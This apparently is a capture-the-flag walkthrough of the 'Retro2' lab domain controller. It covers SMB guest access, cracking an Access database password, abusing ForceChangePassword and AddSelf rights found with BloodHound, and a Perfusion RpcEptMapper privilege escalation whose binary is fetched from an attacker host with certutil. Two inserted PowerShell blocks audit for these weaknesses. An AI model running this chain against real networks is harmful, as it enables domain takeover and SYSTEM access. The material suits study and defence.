
Retro2

Enumeration

Nmap

First, a full TCP port scan was performed against the target:

sudo nmap -p- -sCV 10.10.127.218 -oA nmap/10.10.127.218-full-tcp

Nmap scan report for 10.10.127.218
Host is up (0.052s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-15 12:37:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49172/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-15T12:38:30
|_  start_date: 2026-02-15T12:08:27
|_clock-skew: mean: -19m59s, deviation: 34m36s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: BLN01
|   NetBIOS computer name: BLN01\x00
|   Domain name: retro2.vl
|   Forest name: retro2.vl
|   FQDN: BLN01.retro2.vl
|_  System time: 2026-02-15T13:38:33+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

The scan results identified the host as a Windows Server 2008 R2 Datacenter SP1 Domain Controller named BLN01.retro2.vl.

Key exposed services included:

  • Kerberos (88)
  • LDAP (389)
  • SMB (445)
  • RPC services
  • kpasswd (464)

The SMB OS discovery script confirmed:

  • Hostname: BLN01
  • Domain: retro2.vl
  • OS: Windows Server 2008 R2 Datacenter SP1

SMB

SMB shares were enumerated using guest access:

nxc smb 10.10.127.218 -u 'Guest' -p '' --shares

A share named Public was accessible with read permissions.

FootHold

Inside the share, a Microsoft Access database file (staff.accdb) was identified and downloaded for offline analysis.

smbclient //10.10.127.218/Public -U "Guest"

Cracking the Access Database

The database file was password-protected.

The password hash was extracted and a dictionary attack was then performed with John the Ripper:

office2john staff.accdb > accdbfile.hash

john --wordlist=/usr/share/wordlists/rockyou.txt accdbfile.hash

After the password was cracked, the database was opened and hardcoded domain credentials were found embedded in a VBA macro.

LDAP and BloodHound Enumeration

The recovered credentials were validated:

nxc smb 10.10.127.218 -u 'ldapreader' -p '<password>' --shares

Since the credentials were valid, Active Directory data was collected for further analysis using BloodHound.

nxc ldap 10.10.127.218 -d retro2.vl -u 'ldapreader' -p '<password>' --bloodhound --dns-server 10.10.127.218 -c All

The analysis revealed three domain computer accounts.

It was identified that the machine account FS01$ had ForceChangePassword rights over ADMWS01$.

This permission is critical because it allows resetting the target account’s password without knowledge of the current password. If access to one of the FS0X machine accounts is obtained, full control over the target machine account becomes possible.

Both FS0X machine accounts were configured with their machine names as passwords, which allowed authentication using:

nxc smb 10.10.127.218 -d retro2.vl -u 'fs01$' -p 'fs01'

Note

Before continuing with the exploitation, the following line was added to the /etc/hosts file.

10.10.127.218   retro2.vl BLN01.retro2.vl

The credentials were valid; however, since the account had not been used for a long time, the machine password was out of sync with the domain controller. This is typical of pre-created computer accounts.

To resolve this, the password for FS01$ was reset:

impacket-changepasswd 'retro2.vl/fs01$':'fs01'@retro2.vl -newpass Pa55w0rd -dc-ip BLN01.retro2.vl -p rpc-samr
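The out-of-sync machine password described above is the trace that pre-created computer accounts leave in the directory. The following PowerShell audit is an added example, not part of the original writeup: it lists computer accounts whose attributes suggest they were pre-created and never joined, so an administrator can reset or delete them before they are abused. It assumes the ActiveDirectory RSAT module and a session with read access to the domain.

```powershell
# Added example (not from the original writeup): find computer accounts that look
# pre-created and never used, the pattern behind the FS01$/FS02$ findings above.
# Assumes the ActiveDirectory module and a domain-joined session with read rights.
Import-Module ActiveDirectory

# UF_PASSWD_NOTREQD (0x20) is set on accounts created with the
# "Assign this computer account as a pre-Windows 2000 computer" option.
$PASSWD_NOTREQD = 0x20

function Get-PreCreatedComputerCandidates {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    Get-ADComputer -Filter * -SearchBase $SearchBase `
        -Properties userAccountControl, pwdLastSet, whenCreated, lastLogonTimestamp |
    ForEach-Object {
        # pwdLastSet and lastLogonTimestamp are Windows FILETIME values (UTC).
        $pwdSet    = if ($_.pwdLastSet) { [DateTime]::FromFileTimeUtc($_.pwdLastSet) } else { $null }
        $lastLogon = if ($_.lastLogonTimestamp) { [DateTime]::FromFileTimeUtc($_.lastLogonTimestamp) } else { $null }
        $created   = $_.whenCreated.ToUniversalTime()

        $reasons = @()
        if ($_.userAccountControl -band $PASSWD_NOTREQD) { $reasons += 'PASSWD_NOTREQD set' }
        if (-not $lastLogon) { $reasons += 'never logged on' }
        # A machine that actually joined rotates its password; one that never did
        # still carries the password set at creation time.
        if ($pwdSet -and ($pwdSet - $created).TotalMinutes -lt 5) { $reasons += 'password unchanged since creation' }

        if ($reasons.Count -gt 0) {
            [PSCustomObject]@{
                SamAccountName = $_.SamAccountName
                Created        = $created
                PwdLastSet     = $pwdSet
                LastLogon      = $lastLogon
                Reasons        = ($reasons -join '; ')
            }
        }
    }
}

Get-PreCreatedComputerCandidates | Sort-Object Created | Format-Table -AutoSize
```

Accounts flagged here should have their password reset to a random value (or be removed if the machine was never deployed), which closes the "password equals the machine name" path used in this writeup.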

After resetting the password, the FS01$ account was marked as Owned in BloodHound. Using the “Shortest Paths from Owned Objects” query, it was identified that:

  • FS01$ had ForceChangePassword rights over ADMWS01$.
  • ADMWS01$ had AddSelf privileges on the Services group.
  • The Services group was a member of the Remote Desktop Users group.

Using the identified privileges, the password for ADMWS01$ was reset using:

net rpc password 'ADMWS01$' Pa55w0rd -U retro2.vl/'fs01$' -S BLN01.retro2.vl

Then, using the newly compromised ADMWS01$ account, the ldapreader user was added to the Services group:

net rpc group addmem "Services" "ldapreader" -S BLN01.retro2.vl -U retro2.vl/'ADMWS01$'

# OR WITH BloodyAD
bloodyAD --host BLN01.retro2.vl -d retro2.vl -u 'ADMWS01$' -p 'Rogue1' add groupMember 'SERVICES' 'ldapreader'

Group membership was verified using:

ldapsearch -x -H ldap://10.10.127.218 \
-D "ldapreader" -w "ppYaVcB5R" \
-b "CN=Services,CN=Users,DC=retro2,DC=vl" \
"(objectClass=group)" member

At this stage, the ldapreader user had effective membership in the Remote Desktop Users group.

RDP access to the server was established using Remmina. The TLS security level had to be set to 0; otherwise, the connection would fail.

Privilege escalation

The host was running Windows Server 2008 R2, which is affected by a local privilege escalation flaw caused by improper permissions on the RpcEptMapper registry key, as described in the following blog:

This vulnerability enables privilege escalation to NT AUTHORITY\SYSTEM by:

  • Manipulating the RpcEptMapper registry key
  • Triggering controlled DLL loading behavior

First, the GitHub repository was downloaded and opened in Visual Studio.

Note

If using a Visual Studio version newer than 2019, additional packages must be installed to successfully build the project.

The project was compiled, producing Perfusion.exe.

Finally, the binary was uploaded to the target and executed to spawn a SYSTEM shell session:

certutil.exe -urlcache -f http://10.8.8.46/Perfusion.exe Perfusion.exe
.\Perfusion.exe -c cmd -i
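The escalation above only works because low-privileged principals hold write rights on the RpcEptMapper service key. The following PowerShell check is an added example, not code from the writeup or from the Perfusion project: it inspects that key's ACL on a host and reports any Allow entry that grants subkey-creation or write rights to Everyone, Users, Authenticated Users or Interactive, so affected hosts can be found and the ACL corrected. It assumes an elevated session on the host being audited.

```powershell
# Added example (not from the original writeup): audit the RpcEptMapper service
# key for write access by low-privileged principals. Run from an elevated prompt.
$keyPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcEptMapper'

# Rights that let a non-admin add a subkey or change values under the service key.
$writeRights = [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
               [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

# Well-known low-privilege SIDs: Everyone, Interactive, Authenticated Users, BUILTIN\Users.
$lowPrivSids = @('S-1-1-0', 'S-1-5-4', 'S-1-5-11', 'S-1-5-32-545')

function Test-RpcEptMapperAcl {
    param([string]$Path = $keyPath)

    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Compare on SIDs so the check is independent of display language.
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($lowPrivSids -notcontains $sid) { continue }
        if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }

        [PSCustomObject]@{
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.RegistryRights
            Inherited = $ace.IsInherited
        }
    }
}

$findings = @(Test-RpcEptMapperAcl)
if ($findings.Count -gt 0) {
    Write-Warning "Low-privileged principals can write under ${keyPath}:"
    $findings | Format-Table -AutoSize
} else {
    Write-Output "No low-privileged write access found on ${keyPath}."
}
```

Any reported entry should be removed from the key's ACL (and the host patched or retired, since Windows Server 2008 R2 is out of support); re-running the check afterwards confirms the fix.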